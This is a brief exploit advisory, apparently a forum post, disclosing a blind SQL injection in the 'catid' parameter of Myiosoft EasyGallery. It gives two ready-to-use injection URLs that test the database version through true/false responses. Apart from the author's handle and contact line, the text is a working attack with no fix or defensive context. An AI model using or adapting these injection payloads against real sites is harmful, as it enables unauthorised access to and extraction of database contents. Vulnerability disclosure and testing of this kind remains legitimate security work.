Myiosoft easygallery (catid) Blind SQL Injection Vulnerability ___________________________________ Author: Hussin X Home : www.IQ-TY.com MaiL : darkangeL_G85@Yahoo.CoM ___________________________________ script : http://myiosoft.com/?1.105.0.0 Exploit : _______ true & false http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4 > false http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5 > true end IQ-SecuritY FoRuM